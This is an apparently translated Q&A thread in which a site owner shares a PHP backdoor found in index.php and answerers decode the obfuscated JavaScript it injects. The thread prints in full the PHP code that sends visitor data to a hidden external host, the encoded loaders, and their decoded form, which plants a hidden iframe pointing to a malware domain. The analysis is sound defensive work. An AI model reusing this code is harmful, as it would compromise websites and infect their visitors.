我正在开发电子商务网站。它工作正常,但突然所有的ajax功能都无法正常工作。 当我在firebug中检查ajax代码时,我可以看到一些js字符串附加了该响应:
{"success":"Success: You have added <a href=\"http:\/\/www.test.com\/exmple\">sample<\/a> to your <a href=\"http:\/\/www.test.com
\/index.php?route=checkout\/cart\">shopping cart<\/a>!","total":"2070
items","amount":"$2,028.60"} <script>e=eval;v="0"+"x";a=0;try{a&=2}catch(q){a=1}if(!a)
{try{document["\x62ody"]^=~1;}catch(q) {a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
我只在firefox中收到此错误....
这是他们添加到index.php文件中的内容。
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
我刚刚删除了代码,它的工作正常......
答案 0 :(得分:17)
很糟糕,你没有给我们php注入的完整javascript(请将它添加到你的问题,如果你还有它,所以我们可以decode它)。但非常感谢你分享它背后的PHP!
删除php脚本确实是解决方案,但是 你应该知道你是如何被黑客攻击的?&#39;感染的&#39;首先 !!
注意此类恶意软件经常被谷歌选中:他们会向这样一个被黑网站的索引添加警告:&#39; This site may harm your computer.& #39;
删除此概念需要Request a malware-review&#39;使用谷歌网站管理员工具(我不知道如果你不报告你的页面是固定的,谷歌会在x个时间内自动重新扫描你的页面,我也不知道你是否可以报告你的页面是固定的没有谷歌网站管理员工具,所以如果你不想给你的手机号码谷歌,请注意!!!)。
如果您的php代码中有一个base64 decode字符串aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw,则会获取网址:http://mbrowserstats.com/statE/stat.php
您感染的php网站使用上面的网址GET - 字符串
?ip=YOUR_IP&useragent=YOUR_BROWSER&domainname=INFECTED_WEBSITE_DOMAIN&fullpath=INFECTED_WEBSITE_PAGE&check='.isset($_GET['look'])
获取自定义的唯一按需javascript以插入提供给(目标!! )访问者的标记。
为了解码插入的访问者唯一的javascript的有效负载,我快速启动了decoder(也适用于your partial payload,使用字符_作为分隔符和偏移量 -7 基于 16 数字。)
(部分)字符串:10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
解码为:
if (document.getElementsByTagName('body')[0]){
我想分享我对我得到的变体的分析,解释它是如何工作的(希望它能帮助别人):
我访问过的网站(在palemoon = firefox中)突然启动了java并弹出了一个cmd-box
的Cr @第
&#39;查看来源&#39;该文件中披露了一个被混淆的剧本,该剧本被提供了#39; (插入)之前 html标记(带有前导空格):
<script>w=window;aq="0"+"x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+640!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>
<html>
<head>
<title> etcetera...
通过jsbeautifier.org运行它清理了(在我添加人工解析注释之前):
w = window; //hmmkay, note:reused lateron
aq = "0" + "x"; //so.. '0x', smells like hex
ff = String; //haha, neat, ff is String
ff = ff.fromCharCode; //and ff is now String's fromCharCode method
try {
document["\x62ody"] ^= ~1; //I'm guessing this should fail
} catch (d21vd12v) { //so all the rest gets executed:
v = 123; //bliep? 42? Here be dragons.. aka useless
vzs = false; //ahh, can you guess where this leads?
try { //no idea why this test is here
document;
} catch (q) { //but for an infection this should NOT run
vzs = 1;
}
if (!vzs) e = w["eval"]; //false will become true so e = EVIL
if (1) { //lol, if true, ok...
//ahh, f the payload, an array (by split) of
//640 hex-numbers
f = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74" ["split"](",");
}
w = f; //ahh juggling w to f
s = []; //preparing s to receive the decoded string
for (i = 2 - 2; - i + 640 != 0; i += 1) { //haha, ok: ( 2-2=0; lol; i++ )
j = i; //juggle artist at it again
if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 9); //9 offset
} // 31oct = 19hex = 25 = true, if eval, LOOK MA, WITHOUT parseInt being EVIL
fafa = e; //ok stop juggling. fafa = EVIL
fafa(s) //there we go: EVIL(decoded string)
}
正如人们现在可以阅读的那样,他们通过大量的箍来愚弄病毒扫描程序。
我将此(我的理解)重新考虑到:
w = "/*PAYLOAD: comma separated uni-code characters in hex*/" ["split"](",");
s = '';
for (i = 0; i < 640; i++) {
s += String.fromCharCode( parseInt(w[i],16) + 9 ); //decode
}
eval(s) //execute
使用我的解码器(设置为基座16,分隔字符,和偏移9)the payload decoded至:
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751');f.style.left='-10000px';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
document.getElementsByTagName('body')[0].appendChild(f);
}
请注意,此结果代码缩进了2和3 标签(业余或愚蠢的virusscan?)我删除了以便于阅读。行结尾也是CR(13dec)(使用较旧的MAC的作者/ script-kiddie?)。
所以,现在我们拥有了所有可以(最终)简单解释发生情况的代码:
curl是一个访问者/网站唯一的javascript注入服务标记iframe中注入一个body(由于身体还没有存在,所以浏览器大力帮助),定位{{ 1}}从访问者页面(访问者浏览器)左侧(视线外)和-10000px加载一个特定目标(在用户访问的用户和网站上)外部页面(包含上帝知道什么样的混乱/恶意软件/病毒/ rootkit,在我的案例中来自iframe ,rotatethespin.com:8000,muruno-vaser.info:8000等。)。我还通过使用此书签获取文档的实时HTML来验证这一点:
epomota.com这也显示了源中注入的iframe代码。
我使用下一个bookmarklet将iframe移动到视图中(假设只有1个iframe):
javascript:(function(){ alert(document.documentElement.innerHTML); })()
当然,人们也可以使用萤火虫和类似的工具(取决于浏览器)。
我还注意到,当使用大多数基于web的工具(甚至是w3c验证器)来获取受感染网站的来源时,php没有插入javascript,使网站看起来没有被感染!
我也有这个问题&#39;当尝试一个简单的telnet命令(安全地)获取受感染的代码。然而,在看到它背后的PHP代码后,我意识到我曾经使用过很少的HTTP命令(特别是引用者)
执行:telnet infected-site.com 80然后粘贴以下内容最终给出了受感染的标记源:
GET /path.php?page=something HTTP/1.1 Host: infected-site.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: nl,en-us;q=0.7,en;q=0.3 Referer: http://infected-site.com/index.php Connection: Close
请注意,这样一个人也可以安全地探索(和反向工程)iframe等的来源!!
我还注意到网站所有者的计算机没有获取受感染的代码!这可能是因为他的机器被或感染了,因为分发javascripts的服务器没有提供脚本,因为它知道客户端机器已经被感染了。
更新:在这个答案中有一组工具,我今天重新检查了所包含的网站(经过一夜安眠后)并注入完全不同的脚本(但仍然基于相同的我在这个答案中解释过的技术。
javascript:(function(){ document.getElementsByTagName('iframe')[0].style.left='0px'; })()
请注意,这次数字是八进制(基数为8)(由<script>ss=eval("Str"+"ing");d=document;a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>
分隔,偏移量为,)。
所以我更新了我的解码器以包含基本/基数设置(以及此答案中的所有依赖链接),并且see the payload可以保持相同(除了它指向的域之外)。
我在googling document\["\x62ody"\] ^= ~1找到了这个问题,这个问题给了(大多数没用/感染了)834个结果。
我今天偶然发现的恶意软件上面有上面的字符串和非常独特的字符串'd21vd12v',它提供了8300(也几乎没用/感染)的结果。
然而googling '// This code use for global bot statistic'(在你的问题中提供的php中找到)提供了超过410万条结果(至少可以追溯到2010年),这表明wordpress,joomla等也是这个问题的受害者。技术&#39 ;.
阅读其中一些链接(例如this,this或this)我得到的印象就是愚弄搜索引擎(如google)以便增加页面排名。这是以造成自我造成的恶意软件漏洞为代价的 当然,专门分发恶意软件的变种现在试图将自己隐藏在搜索引擎中。
答案 1 :(得分:1)
这看起来像“注入”代码,导致另一个URL为黑洞漏洞利用工具包提供服务。